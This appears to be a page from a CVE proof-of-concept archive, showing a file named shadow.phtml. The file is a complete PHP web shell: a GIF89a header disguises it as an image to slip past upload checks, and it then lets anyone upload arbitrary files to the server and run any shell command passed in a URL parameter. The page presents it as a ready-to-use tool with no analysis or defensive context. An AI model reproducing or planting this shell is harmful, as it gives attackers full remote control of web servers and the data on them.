5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / shadow.phtml PHTML
GIF89a
<?php
if(isset($_FILES['f'])){
    $dir = dirname(__FILE__) . '/';
    $name = basename($_FILES['f']['name']);
    if(move_uploaded_file($_FILES['f']['tmp_name'], $dir . $name)){
        $url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . str_replace(basename(__FILE__), '', $_SERVER['PHP_SELF']) . $name;
        echo "File uploaded: <b>" . htmlspecialchars($name) . "</b><br>";
        echo "<a href='" . $url . "' target='_blank'>[ open ]</a>";
    } else {
        echo "Failed.";
    }
}
if(isset($_GET['cmd'])){
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>
<form method="POST" enctype="multipart/form-data">
  <input type="file" name="f">
  <button>-Shadow-Here-</button>
</form>